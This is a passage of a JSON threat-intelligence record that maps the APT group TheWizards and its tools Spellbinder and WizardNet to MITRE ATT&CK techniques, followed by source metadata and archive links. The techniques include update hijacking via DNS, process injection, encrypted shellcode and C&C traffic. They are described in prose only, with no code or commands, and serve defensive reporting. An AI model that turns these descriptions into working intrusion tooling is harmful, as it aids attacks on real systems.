T1588.002 | Obtain Capabilities: Tool | TheWizards installs WinPcap on compromised machines; it is required by Spellbinder.\r\nInitial Access | T1659 | Content Injection | Spellbinder issues DNS answer messages with the IP address of a malicious server to hijack updates from legitimate applications.\r\nExecution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | TheWizards uses cmd.exe to execute commands to download and execute tools.\r\nExecution | T1106 | Native API | WizardNet uses CreateProcessA to execute processes 
it injects shellcode into.\r\nPrivilege Escalation | T1055 | Process Injection | WizardNet can inject code into Windows processes.\r\nDefense Evasion | T1480.002 | Execution Guardrails: Mutual Exclusion | WizardNet creates a mutex to prevent other instances of the backdoor from running.\r\nDefense Evasion | T1112 | Modify Registry | An unknown TheWizards component stores encrypted shellcode in the registry.\r\nDefense Evasion | T1027.007 | Obfuscated Files or Information: Dynamic API Resolution | The downloader and shellcode used by TheWizards dynamically resolve API addresses.\r\nDefense Evasion | T1027.009 | Obfuscated Files or Information: Embedded Payloads | The shellcode obtained by the downloader contains WizardNet in encrypted form.\r\nDefense Evasion | T1027.014 | Obfuscated Files or Information: Polymorphic Code | The file log.dat contains polymorphic decryption code that loads the Spellbinder tool into memory.\r\nDefense Evasion | T1055 | Process Injection | WizardNet injects shellcode into another process.\r\nDefense Evasion | T1055.004 | Process Injection: Asynchronous Procedure Call | WizardNet uses the QueueUserAPC API to execute injected code.\r\nDiscovery | T1518.001 | Software Discovery: Security Software Discovery | WizardNet obtains the name of running processes and matches them against a list of security solutions.\r\nDiscovery | T1082 | System Information Discovery | WizardNet obtains system information such as computer name, uptime, OS name, etc.\r\nDiscovery | T1124 | System Time Discovery | WizardNet gets the system time.\r\nCommand and Control | T1105 | Ingress Tool Transfer | WizardNet can deploy tools and new modules obtained from its C\u0026C.\r\nCommand and Control | T1095 | Non-Application Layer Protocol | WizardNet uses TCP and UDP to communicate with its C\u0026C.\r\nCommand and Control | T1573.001 | Encrypted Channel: Symmetric 
Cryptography | WizardNet can communicate via TCP or UDP, and messages exchanged with its C\u0026C are encrypted with AES.\r\nSource: https://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/"
	],
	"report_names": [
		"thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks"
	],
	"threat_actors": [
		{
			"id": "86adb59b-9acc-4dac-b7f1-7ac9214c4b97",
			"created_at": "2025-06-29T02:01:57.19934Z",
			"updated_at": "2026-04-10T02:00:04.936171Z",
			"deleted_at": null,
			"main_name": "TheWizards",
			"aliases": [],
			"source_name": "ETDA:TheWizards",
			"tools": [
				"Spellbinder",
				"WizardNet"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "dc813ffb-16bd-46f7-9d8f-8e93089f00c1",
			"created_at": "2024-12-28T02:01:54.748213Z",
			"updated_at": "2026-04-10T02:00:04.669444Z",
			"deleted_at": null,
			"main_name": "Earth Minotaur",
			"aliases": [],
			"source_name": "ETDA:Earth Minotaur",
			"tools": [
				"DarkNimbus",
				"MOONSHINE"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "06f59286-7fc1-4cae-8088-a26543643247",
			"created_at": "2025-11-07T02:00:03.494055Z",
			"updated_at": "2026-04-10T02:00:03.893442Z",
			"deleted_at": null,
			"main_name": "TheWizards",
			"aliases": [],
			"source_name": "MISPGALAXY:TheWizards",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434664,
	"ts_updated_at": 1775826737,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5a7cea0a838c40b821978a2db79d18a732f0345c.pdf",
		"text": "https://archive.orkl.eu/5a7cea0a838c40b821978a2db79d18a732f0345c.txt",
		"img": "https://archive.orkl.eu/5a7cea0a838c40b821978a2db79d18a732f0345c.jpg"
	}
}